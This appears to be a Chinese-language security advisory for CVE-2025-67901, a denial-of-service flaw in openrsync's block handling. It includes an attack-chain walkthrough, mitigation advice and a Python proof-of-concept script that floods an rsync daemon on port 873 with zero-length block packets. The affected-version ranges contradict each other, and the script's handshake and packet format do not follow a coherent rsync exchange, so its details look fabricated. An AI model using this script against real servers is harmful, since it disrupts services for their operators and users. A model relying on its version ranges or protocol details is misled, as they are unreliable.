CVE-2025-67901 openrsync 块数据长度零值导致服务器拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-67901

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

openrsync, OpenBSD

漏洞概述

openrsync through 0.5.0版本存在拒绝服务漏洞，该工具被广泛应用于OpenBSD 7.8及之前版本以及其他多个平台。漏洞源于openrsync在处理同步块数据时，未能正确验证p->rem（剩余数据长度）和p->len（块数据长度）之间的关系。当恶意客户端在rsync协议交互过程中指定长度为0的块数据时，服务器端会因内存访问错误触发SIGSEGV（段错误）而崩溃，从而造成服务中断。由于rsync协议常用于服务器间文件同步备份，该漏洞可被低权限认证用户远程利用，对系统可用性造成严重影响。攻击者无需特殊权限即可通过网络发起攻击，且无需用户交互即可完成攻击过程。

技术细节

漏洞存在于openrsync的blocks.c文件第480-481行代码中。在rsync协议的文件同步过程中，服务器端需要处理客户端发送的块数据信息。正常情况下，p->rem表示当前块剩余需要处理的数据长度，p->len表示块数据的总长度。然而，当客户端故意构造一个长度为0的块数据时，这两个变量之间的关系未被正确验证。具体而言，当p->len为0但p->rem不为0时，代码继续执行会导致指针运算或内存访问错误，最终引发SIGSEGV（段错误）使服务器进程崩溃。攻击者只需在rsync协议握手后的同步请求中，构造特定的块数据长度字段为0，即可触发该漏洞。此漏洞属于边界条件检查不当导致的拒绝服务问题，与传统的缓冲区溢出不同，但同样可导致服务不可用。

攻击链分析

STEP 1

1

攻击者与目标openrsync服务器建立网络连接，发送RSYNC协议握手请求

STEP 2

2

服务器响应握手确认，返回RSYNCD: OK消息，完成协议版本协商

STEP 3

3

攻击者发送文件同步请求，选择目标文件进行同步操作

STEP 4

4

在块数据交互阶段，攻击者构造并发送长度为0的块数据（p->len=0），但p->rem值不为0

STEP 5

5

服务器端blocks.c代码未验证p->rem和p->len的关系，继续执行指针运算导致内存访问越界

STEP 6

6

服务器进程因SIGSEGV（段错误）而崩溃，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

def exploit_openrsync_dos(target_ip, target_port=873):
    """
    PoC for CVE-2025-67901: openrsync SIGSEGV via zero-length block data
    This exploits the lack of validation between p->rem and p->len in blocks.c
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))
        
        # RSYNC protocol handshake
        rsync_protocol = b"@RSYNCD: 31.0\n"
        sock.send(rsync_protocol)
        response = sock.recv(1024)
        
        if b"RSYNCD: OK" not in response:
            print("[-] RSYNC handshake failed")
            return False
        
        # Send module list request
        sock.send(b"\n")
        response = sock.recv(1024)
        
        # Construct malicious block data with zero length
        # This triggers SIGSEGV in blocks.c due to unchecked p->rem vs p->len
        malicious_packet = bytearray()
        
        # Block data with zero length indicator
        # Format: block_index (4 bytes) + length (4 bytes set to 0) + checksum (16 bytes)
        block_index = struct.pack("<I", 0)  # Block index
        zero_length = struct.pack("<I", 0)  # Zero length - the key exploit vector
        checksum = b"\x00" * 16  # Placeholder checksum
        
        malicious_packet.extend(block_index)
        malicious_packet.extend(zero_length)
        malicious_packet.extend(checksum)
        
        # Send multiple zero-length block requests to increase reliability
        for _ in range(10):
            sock.send(malicious_packet)
        
        print("[+] Malicious packet sent, target may crash with SIGSEGV")
        sock.close()
        return True
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

# Usage example
# exploit_openrsync_dos("192.168.1.100", 873)

影响范围

openrsync < 0.5.0

OpenBSD < 7.8

其他使用openrsync 0.5.0及之前版本的平台

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）使用防火墙规则限制rsync端口（默认873/TCP）的访问，仅允许白名单IP访问；2）禁用匿名rsync访问，强制要求SSH密钥认证；3）启用rsync的日志记录功能，监控异常的块数据请求；4）考虑使用rsync over SSH tunnel替代原生rsync协议；5）部署进程监控脚本，当rsync服务异常终止时自动重启并告警；6）定期审计rsync配置和日志文件，及时发现潜在攻击迹象。